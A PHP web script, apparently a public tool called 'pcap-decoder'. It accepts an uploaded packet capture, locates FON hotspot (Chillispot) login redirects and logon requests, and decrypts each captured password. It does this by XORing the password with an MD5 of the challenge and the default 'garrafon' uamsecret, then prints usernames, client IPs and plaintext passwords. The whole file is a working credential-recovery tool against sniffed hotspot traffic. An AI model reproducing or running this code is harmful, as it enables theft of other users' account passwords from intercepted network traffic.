<?PHP
if(!isset($_FILES['file']) or empty($_FILES['file']['tmp_name']))
{
    header("Content-Type: text/html");
    echo "<html>\n";
    echo "<head><title>pcap-decoder - parse pcap log files for FON logins</title>\n";
    echo "<script src=\"http://www.google-analytics.com/urchin.js\" type=\"text/javascript\">\n";
    echo "</script>\n";
    echo "<script type=\"text/javascript\">\n";
    echo "_uacct = \"UA-484468-3\";\n";
    echo "urchinTracker();\n";
    echo "</script>\n";
    echo "</head>\n";
    echo "<body>\n";
    echo "<h1>pcap-decoder - parse pcap log files for FON logins</h1>\n";
    echo "<form enctype=\"multipart/form-data\" action=\"".$_SERVER['PHP_SELF']."\" method=\"POST\">\n";
    echo "<input name=\"file\" type=\"file\"><br>\n";
    echo "<input name=\"uamsecret\" type=\"text\" value=\"garrafon\">uamsecret (Don't change this)<br>\n";
    echo "<input type=\"submit\">\n";
    echo "</form>\n";
    echo "How To can be found <a href=\"http://fon.freddy.eu.org/pcap-decoder/howto/\" target=\"_blank\">here</a><br>";
    echo "Source is available <a href=\"pcap-decoder.phps\">here</a>";
    echo "</body></html>\n";
    exit();
}
else
{
    header("Content-Type: text/plain");
    $file = $_FILES['file']['tmp_name'];
}


$uamsecret = $_POST['uamsecret'];

function ParsePacketHeader($PacketHeaderString) // 16 Bytes
{
    $PacketHeader = array();
    $PacketHeader['ts_sec'] = array_shift(unpack("L", substr($PacketHeaderString, 0, 4))); # timestamp seconds
    $PacketHeader['ts_usec'] = array_shift(unpack("L", substr($PacketHeaderString, 4, 4))); # timestamp microseconds
    $PacketHeader['incl_len'] = array_shift(unpack("L", substr($PacketHeaderString, 8, 4))); # number of octets of packet saved in file
    $PacketHeader['orig_len'] = array_shift(unpack("L", substr($PacketHeaderString, 12, 4))); # actual length of packet
    return $PacketHeader;
}

$handle = fopen($file, "r");

$challenges = array();
$eof = filesize($file) - 1;
fseek ($handle, 24, SEEK_SET);
while(ftell($handle) <= $eof)
{
    $PacketHeader = ParsePacketHeader(fread($handle, 16)); # read and parse the header
    $PacketData = fread($handle, $PacketHeader['incl_len']); # read the packet data
    if($pos = strpos($PacketData, "HTTP/1.0 302 Moved Temporarily\r\nLocation: https://login.fon.com/"))
    {
        $clientip = substr($PacketData, ($pos - 24), 4); # get the 4 IP Bytes
        $clientip = ord($clientip[0]).".".ord($clientip[1]).".".ord($clientip[2]).".".ord($clientip[3]); # convert them
        #echo "Got a chillispot redirect for ".$clientip.", investigating...\n";
        if(preg_match("/HTTP\/1.0 302 Moved Temporarily\r\nLocation: https:\/\/login.fon.com\/.*?cp\/index\.php\?res=(.*?)\&uamip=(.*?)\&uamport=(.*?)\&(challenge|uid)=(.*?)\&.*?\&nasid=(.*?)\&mac=(.*)/", $PacketData, $results))
        #Location: https://login.fon.com/46b34...3b49864/cp/index.php?res=notyet&uamip=10.100.1.1&uamport=3990&challenge=36430...142cef&userurl=&nasid=00-XX-XX-XX-XX-XX&mac=00-XX-XX-XX-XX-XX
        #Location: https://login.fon.com/46b34...3b49864/cp/index.php?res=failed&uamip=10.100.1.1&uamport=3990&challenge=31260...ce433c&userurl=&reply=Request%20Denied&nasid=00-XX-XX-XX-XX-XX&mac=00-XX-XX-XX-XX-XX
        #Location: https://login.fon.com/46b34...3b49864/cp/index.php?res=success&uamip=10.100.1.1&uamport=3990&uid=MyFonUserName&userurl=&nasid=00-XX-XX-XX-XX-XX&mac=00-XX-XX-XX-XX-XX
        {
            /* $results
                [1] => notyet/failed/success
                [2] => 10.100.1.1
                [3] => 3990
                [4] => challenge/uid
                [5] => 31260...ce433c/FON Username
                [6] => 00-XX-XX-XX-XX-XX (nasid)
                [7] => 00-XX-XX-XX-XX-XX (client mac)
            */
            if($results[1] == "notyet")
            {
                echo $clientip." is not logged on yet\n";
            }
            elseif($results[1] == "failed")
            {
                echo ">>> LOGON FROM ".$clientip." FAILED\n";
            }
            elseif($results[1] == "success")
            {
                echo ">>> SUCCESSFUL LOGON FROM ".$clientip." (".urldecode($results[5]).")\n";
            }
            if($results[4] == "challenge")
            {
                echo "got challenge for ".$clientip.": ".$results[5]."\n";
                $challenges[$clientip] = $results[5];
            }
        }
    }
    elseif($pos = strpos($PacketData, "GET /logon?username="))
    {
        $clientip = substr($PacketData, ($pos - 28), 4); # get the 4 IP Bytes
        $clientip = ord($clientip[0]).".".ord($clientip[1]).".".ord($clientip[2]).".".ord($clientip[3]); # convert them
        if(preg_match("/GET \/logon\?username=(.*?)&password=(.*?) HTTP\/1\.1/", $PacketData, $results))
        #GET /logon?username=FonUserName&password=b31...fbb HTTP/1.1
        {
            /* $results
                [1] => FON Username (eMail)
                [2] => b31...dbb (encrypted password)
            */
            if(!empty($challenges[$clientip]))
            {
                // have a challenge => decoding password
                $hex_chal    = pack('H32', $challenges[$clientip]);
                $newchal = pack('H*', md5($hex_chal.$uamsecret));
                $userpassword = pack('H32', $results[2]) ^ $newchal;
                $userpassword = trim($userpassword, "\x00");
            }
            else
            {
                $userpassword = "couldn't decode password, unknown challenge";
            }
            echo ">>> ".urldecode($results[1])." TRIES TO LOGIN FROM ".$clientip." WITH PASSWORD \"".$userpassword."\"\n";
        }
    }
}

fclose($handle);
echo "Parsing complete";
?>